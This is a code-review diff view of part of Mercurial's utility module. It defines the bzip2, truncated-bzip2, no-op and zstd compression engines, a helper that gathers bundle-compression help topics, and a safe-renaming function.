3593 # We declare a protocol name but don't advertise by default because
3593 # We declare a protocol name but don't advertise by default because
3594 # it is slow.
3594 # it is slow.
3595 def wireprotosupport(self):
3595 def wireprotosupport(self):
3596 return compewireprotosupport('bzip2', 0, 0)
3596 return compewireprotosupport('bzip2', 0, 0)
3597
3597
3598 def compressstream(self, it, opts=None):
3598 def compressstream(self, it, opts=None):
3599 opts = opts or {}
3599 opts = opts or {}
3600 z = bz2.BZ2Compressor(opts.get('level', 9))
3600 z = bz2.BZ2Compressor(opts.get('level', 9))
3601 for chunk in it:
3601 for chunk in it:
3602 data = z.compress(chunk)
3602 data = z.compress(chunk)
3603 if data:
3603 if data:
3604 yield data
3604 yield data
3605
3605
3606 yield z.flush()
3606 yield z.flush()
3607
3607
3608 def decompressorreader(self, fh):
3608 def decompressorreader(self, fh):
3609 def gen():
3609 def gen():
3610 d = bz2.BZ2Decompressor()
3610 d = bz2.BZ2Decompressor()
3611 for chunk in filechunkiter(fh):
3611 for chunk in filechunkiter(fh):
3612 yield d.decompress(chunk)
3612 yield d.decompress(chunk)
3613
3613
3614 return chunkbuffer(gen())
3614 return chunkbuffer(gen())
3615
3615
3616 compengines.register(_bz2engine())
3616 compengines.register(_bz2engine())
3617
3617
3618 class _truncatedbz2engine(compressionengine):
3618 class _truncatedbz2engine(compressionengine):
3619 def name(self):
3619 def name(self):
3620 return 'bz2truncated'
3620 return 'bz2truncated'
3621
3621
3622 def bundletype(self):
3622 def bundletype(self):
3623 return None, '_truncatedBZ'
3623 return None, '_truncatedBZ'
3624
3624
3625 # We don't implement compressstream because it is hackily handled elsewhere.
3625 # We don't implement compressstream because it is hackily handled elsewhere.
3626
3626
3627 def decompressorreader(self, fh):
3627 def decompressorreader(self, fh):
3628 def gen():
3628 def gen():
3629 # The input stream doesn't have the 'BZ' header. So add it back.
3629 # The input stream doesn't have the 'BZ' header. So add it back.
3630 d = bz2.BZ2Decompressor()
3630 d = bz2.BZ2Decompressor()
3631 d.decompress('BZ')
3631 d.decompress('BZ')
3632 for chunk in filechunkiter(fh):
3632 for chunk in filechunkiter(fh):
3633 yield d.decompress(chunk)
3633 yield d.decompress(chunk)
3634
3634
3635 return chunkbuffer(gen())
3635 return chunkbuffer(gen())
3636
3636
3637 compengines.register(_truncatedbz2engine())
3637 compengines.register(_truncatedbz2engine())
3638
3638
3639 class _noopengine(compressionengine):
3639 class _noopengine(compressionengine):
3640 def name(self):
3640 def name(self):
3641 return 'none'
3641 return 'none'
3642
3642
3643 def bundletype(self):
3643 def bundletype(self):
3644 """No compression is performed.
3644 """No compression is performed.
3645
3645
3646 Use this compression engine to explicitly disable compression.
3646 Use this compression engine to explicitly disable compression.
3647 """
3647 """
3648 return 'none', 'UN'
3648 return 'none', 'UN'
3649
3649
3650 # Clients always support uncompressed payloads. Servers don't because
3650 # Clients always support uncompressed payloads. Servers don't because
3651 # unless you are on a fast network, uncompressed payloads can easily
3651 # unless you are on a fast network, uncompressed payloads can easily
3652 # saturate your network pipe.
3652 # saturate your network pipe.
3653 def wireprotosupport(self):
3653 def wireprotosupport(self):
3654 return compewireprotosupport('none', 0, 10)
3654 return compewireprotosupport('none', 0, 10)
3655
3655
3656 # We don't implement revlogheader because it is handled specially
3656 # We don't implement revlogheader because it is handled specially
3657 # in the revlog class.
3657 # in the revlog class.
3658
3658
3659 def compressstream(self, it, opts=None):
3659 def compressstream(self, it, opts=None):
3660 return it
3660 return it
3661
3661
3662 def decompressorreader(self, fh):
3662 def decompressorreader(self, fh):
3663 return fh
3663 return fh
3664
3664
3665 class nooprevlogcompressor(object):
3665 class nooprevlogcompressor(object):
3666 def compress(self, data):
3666 def compress(self, data):
3667 return None
3667 return None
3668
3668
3669 def revlogcompressor(self, opts=None):
3669 def revlogcompressor(self, opts=None):
3670 return self.nooprevlogcompressor()
3670 return self.nooprevlogcompressor()
3671
3671
3672 compengines.register(_noopengine())
3672 compengines.register(_noopengine())
3673
3673
3674 class _zstdengine(compressionengine):
3674 class _zstdengine(compressionengine):
3675 def name(self):
3675 def name(self):
3676 return 'zstd'
3676 return 'zstd'
3677
3677
3678 @propertycache
3678 @propertycache
3679 def _module(self):
3679 def _module(self):
3680 # Not all installs have the zstd module available. So defer importing
3680 # Not all installs have the zstd module available. So defer importing
3681 # until first access.
3681 # until first access.
3682 try:
3682 try:
3683 from . import zstd
3683 from . import zstd
3684 # Force delayed import.
3684 # Force delayed import.
3685 zstd.__version__
3685 zstd.__version__
3686 return zstd
3686 return zstd
3687 except ImportError:
3687 except ImportError:
3688 return None
3688 return None
3689
3689
3690 def available(self):
3690 def available(self):
3691 return bool(self._module)
3691 return bool(self._module)
3692
3692
3693 def bundletype(self):
3693 def bundletype(self):
3694 """A modern compression algorithm that is fast and highly flexible.
3694 """A modern compression algorithm that is fast and highly flexible.
3695
3695
3696 Only supported by Mercurial 4.1 and newer clients.
3696 Only supported by Mercurial 4.1 and newer clients.
3697
3697
3698 With the default settings, zstd compression is both faster and yields
3698 With the default settings, zstd compression is both faster and yields
3699 better compression than ``gzip``. It also frequently yields better
3699 better compression than ``gzip``. It also frequently yields better
3700 compression than ``bzip2`` while operating at much higher speeds.
3700 compression than ``bzip2`` while operating at much higher speeds.
3701
3701
3702 If this engine is available and backwards compatibility is not a
3702 If this engine is available and backwards compatibility is not a
3703 concern, it is likely the best available engine.
3703 concern, it is likely the best available engine.
3704 """
3704 """
3705 return 'zstd', 'ZS'
3705 return 'zstd', 'ZS'
3706
3706
3707 def wireprotosupport(self):
3707 def wireprotosupport(self):
3708 return compewireprotosupport('zstd', 50, 50)
3708 return compewireprotosupport('zstd', 50, 50)
3709
3709
3710 def revlogheader(self):
3710 def revlogheader(self):
3711 return '\x28'
3711 return '\x28'
3712
3712
3713 def compressstream(self, it, opts=None):
3713 def compressstream(self, it, opts=None):
3714 opts = opts or {}
3714 opts = opts or {}
3715 # zstd level 3 is almost always significantly faster than zlib
3715 # zstd level 3 is almost always significantly faster than zlib
3716 # while providing no worse compression. It strikes a good balance
3716 # while providing no worse compression. It strikes a good balance
3717 # between speed and compression.
3717 # between speed and compression.
3718 level = opts.get('level', 3)
3718 level = opts.get('level', 3)
3719
3719
3720 zstd = self._module
3720 zstd = self._module
3721 z = zstd.ZstdCompressor(level=level).compressobj()
3721 z = zstd.ZstdCompressor(level=level).compressobj()
3722 for chunk in it:
3722 for chunk in it:
3723 data = z.compress(chunk)
3723 data = z.compress(chunk)
3724 if data:
3724 if data:
3725 yield data
3725 yield data
3726
3726
3727 yield z.flush()
3727 yield z.flush()
3728
3728
3729 def decompressorreader(self, fh):
3729 def decompressorreader(self, fh):
3730 zstd = self._module
3730 zstd = self._module
3731 dctx = zstd.ZstdDecompressor()
3731 dctx = zstd.ZstdDecompressor()
3732 return chunkbuffer(dctx.read_from(fh))
3732 return chunkbuffer(dctx.read_from(fh))
3733
3733
3734 class zstdrevlogcompressor(object):
3734 class zstdrevlogcompressor(object):
3735 def __init__(self, zstd, level=3):
3735 def __init__(self, zstd, level=3):
3736 # Writing the content size adds a few bytes to the output. However,
3736 # Writing the content size adds a few bytes to the output. However,
3737 # it allows decompression to be more optimal since we can
3737 # it allows decompression to be more optimal since we can
3738 # pre-allocate a buffer to hold the result.
3738 # pre-allocate a buffer to hold the result.
3739 self._cctx = zstd.ZstdCompressor(level=level,
3739 self._cctx = zstd.ZstdCompressor(level=level,
3740 write_content_size=True)
3740 write_content_size=True)
3741 self._dctx = zstd.ZstdDecompressor()
3741 self._dctx = zstd.ZstdDecompressor()
3742 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3742 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3743 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3743 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3744
3744
3745 def compress(self, data):
3745 def compress(self, data):
3746 insize = len(data)
3746 insize = len(data)
3747 # Caller handles empty input case.
3747 # Caller handles empty input case.
3748 assert insize > 0
3748 assert insize > 0
3749
3749
3750 if insize < 50:
3750 if insize < 50:
3751 return None
3751 return None
3752
3752
3753 elif insize <= 1000000:
3753 elif insize <= 1000000:
3754 compressed = self._cctx.compress(data)
3754 compressed = self._cctx.compress(data)
3755 if len(compressed) < insize:
3755 if len(compressed) < insize:
3756 return compressed
3756 return compressed
3757 return None
3757 return None
3758 else:
3758 else:
3759 z = self._cctx.compressobj()
3759 z = self._cctx.compressobj()
3760 chunks = []
3760 chunks = []
3761 pos = 0
3761 pos = 0
3762 while pos < insize:
3762 while pos < insize:
3763 pos2 = pos + self._compinsize
3763 pos2 = pos + self._compinsize
3764 chunk = z.compress(data[pos:pos2])
3764 chunk = z.compress(data[pos:pos2])
3765 if chunk:
3765 if chunk:
3766 chunks.append(chunk)
3766 chunks.append(chunk)
3767 pos = pos2
3767 pos = pos2
3768 chunks.append(z.flush())
3768 chunks.append(z.flush())
3769
3769
3770 if sum(map(len, chunks)) < insize:
3770 if sum(map(len, chunks)) < insize:
3771 return ''.join(chunks)
3771 return ''.join(chunks)
3772 return None
3772 return None
3773
3773
3774 def decompress(self, data):
3774 def decompress(self, data):
3775 insize = len(data)
3775 insize = len(data)
3776
3776
3777 try:
3777 try:
3778 # This was measured to be faster than other streaming
3778 # This was measured to be faster than other streaming
3779 # decompressors.
3779 # decompressors.
3780 dobj = self._dctx.decompressobj()
3780 dobj = self._dctx.decompressobj()
3781 chunks = []
3781 chunks = []
3782 pos = 0
3782 pos = 0
3783 while pos < insize:
3783 while pos < insize:
3784 pos2 = pos + self._decompinsize
3784 pos2 = pos + self._decompinsize
3785 chunk = dobj.decompress(data[pos:pos2])
3785 chunk = dobj.decompress(data[pos:pos2])
3786 if chunk:
3786 if chunk:
3787 chunks.append(chunk)
3787 chunks.append(chunk)
3788 pos = pos2
3788 pos = pos2
3789 # Frame should be exhausted, so no finish() API.
3789 # Frame should be exhausted, so no finish() API.
3790
3790
3791 return ''.join(chunks)
3791 return ''.join(chunks)
3792 except Exception as e:
3792 except Exception as e:
3793 raise error.RevlogError(_('revlog decompress error: %s') %
3793 raise error.RevlogError(_('revlog decompress error: %s') %
3794 str(e))
3794 str(e))
3795
3795
3796 def revlogcompressor(self, opts=None):
3796 def revlogcompressor(self, opts=None):
3797 opts = opts or {}
3797 opts = opts or {}
3798 return self.zstdrevlogcompressor(self._module,
3798 return self.zstdrevlogcompressor(self._module,
3799 level=opts.get('level', 3))
3799 level=opts.get('level', 3))
3800
3800
3801 compengines.register(_zstdengine())
3801 compengines.register(_zstdengine())
3802
3802
3803 def bundlecompressiontopics():
3803 def bundlecompressiontopics():
3804 """Obtains a list of available bundle compressions for use in help."""
3804 """Obtains a list of available bundle compressions for use in help."""
3805 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3805 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3806 items = {}
3806 items = {}
3807
3807
3808 # We need to format the docstring. So use a dummy object/type to hold it
3808 # We need to format the docstring. So use a dummy object/type to hold it
3809 # rather than mutating the original.
3809 # rather than mutating the original.
3810 class docobject(object):
3810 class docobject(object):
3811 pass
3811 pass
3812
3812
3813 for name in compengines:
3813 for name in compengines:
3814 engine = compengines[name]
3814 engine = compengines[name]
3815
3815
3816 if not engine.available():
3816 if not engine.available():
3817 continue
3817 continue
3818
3818
3819 bt = engine.bundletype()
3819 bt = engine.bundletype()
3820 if not bt or not bt[0]:
3820 if not bt or not bt[0]:
3821 continue
3821 continue
3822
3822
3823 doc = pycompat.sysstr('``%s``\n %s') % (
3823 doc = pycompat.sysstr('``%s``\n %s') % (
3824 bt[0], engine.bundletype.__doc__)
3824 bt[0], engine.bundletype.__doc__)
3825
3825
3826 value = docobject()
3826 value = docobject()
3827 value.__doc__ = doc
3827 value.__doc__ = doc
3828 value._origdoc = engine.bundletype.__doc__
3828 value._origdoc = engine.bundletype.__doc__
3829 value._origfunc = engine.bundletype
3829 value._origfunc = engine.bundletype
3830
3830
3831 items[bt[0]] = value
3831 items[bt[0]] = value
3832
3832
3833 return items
3833 return items
3834
3834
3835 i18nfunctions = bundlecompressiontopics().values()
3835 i18nfunctions = bundlecompressiontopics().values()
3836
3836
3837 # convenient shortcut
3837 # convenient shortcut
3838 dst = debugstacktrace
3838 dst = debugstacktrace
3839
3839
3840 def safename(f, tag, ctx, others=None):
3840 def safename(f, tag, ctx, others=None):
3841 """
3841 """
3842 Generate a name that it is safe to rename f to in the given context.
3842 Generate a name that it is safe to rename f to in the given context.
3843
3843
3844 f: filename to rename
3844 f: filename to rename
3845 tag: a string tag that will be included in the new name
3845 tag: a string tag that will be included in the new name
3846 ctx: a context, in which the new name must not exist
3846 ctx: a context, in which the new name must not exist
3847 others: a set of other filenames that the new name must not be in
3847 others: a set of other filenames that the new name must not be in
3848
3848
3849 Returns a file name of the form oldname~tag[~number] which does not exist
3849 Returns a file name of the form oldname~tag[~number] which does not exist
3850 in the provided context and is not in the set of other names.
3850 in the provided context and is not in the set of other names.
3851 """
3851 """
3852 if others is None:
3852 if others is None:
3853 others = set()
3853 others = set()
3854
3854
3855 fn = '%s~%s' % (f, tag)
3855 fn = '%s~%s' % (f, tag)
3856 if fn not in ctx and fn not in others:
3856 if fn not in ctx and fn not in others:
3857 return fn
3857 return fn
3858 for n in itertools.count(1):
3858 for n in itertools.count(1):
3859 fn = '%s~%s~%s' % (f, tag, n)
3859 fn = '%s~%s~%s' % (f, tag, n)
3860 if fn not in ctx and fn not in others:
3860 if fn not in ctx and fn not in others:
3861 return fn
3861 return fn
General Comments 0
You need to be logged in to leave comments. Login now